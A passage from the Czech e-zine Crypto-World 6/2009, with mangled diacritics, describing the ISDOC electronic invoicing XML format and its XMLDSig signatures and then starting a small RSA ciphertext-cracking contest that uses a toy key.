[3] SCHNEIER Bruce CCTV doesnt keep us safe yet the cameras are everywhere [online]

2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwguardiancouktechnology2008jun26politicsukcrimegt

[4] SCHNEIER Bruce Our Data Ourselves [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwwiredcomprintpoliticssecuritycommentarysecuritymatters200805securitymatters_0515gt

[5] Onion routing [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpenwikipediaorgwikiOnion_routinggt

[6] Tor anonymity online [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwtorprojectorggt

[7] DIFFIE Whitfield HELLMAN Martin New Directions in Cryptography [online] 1976 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwcsrutgersedu~tdnguyenclassescs671presentationsArvind-NEWDIRSpdfgt

[8] PKI [online] - [cit 2009-04-26] Dostupnyacute z WWW lthttpcswikipediaorgwikiPKIgt

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

